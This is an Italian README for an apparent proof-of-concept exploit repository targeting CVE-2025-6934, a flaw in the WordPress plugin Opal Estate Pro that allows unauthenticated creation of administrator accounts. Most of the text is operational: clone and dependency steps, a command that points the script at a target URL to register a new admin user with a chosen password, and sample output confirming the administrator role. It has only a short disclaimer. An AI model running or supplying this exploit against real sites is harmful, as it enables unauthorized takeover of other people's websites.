
CVE-2025-6934 è una vulnerabilità critica nel plugin WordPress Opal Estate Pro (<= 1.7.5) che consente a utenti non autenticati di creare nuovi account amministratore attraverso il processo di registrazione AJAX insicuro del plugin.
📖 Descrizione Questo repository contiene un Proof of Concept (PoC) exploit per CVE-2025-6934, una vulnerabilità critica nel plugin WordPress: Opal Estate Pro <= 1.7.5, che consente la creazione di un account amministratore non autenticato.
⚠️ Disclaimer: Questo strumento è fornito esclusivamente per scopi educativi e di ricerca sulla sicurezza.
L'autore non è responsabile per qualsiasi uso improprio o danno causato.
readme.txtClona il repository e installa le dipendenze:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Esegui lo script con il tuo target:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Esempio di output:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Questo progetto è concesso in licenza con la licenza MIT – consulta il file LICENSE per i dettagli.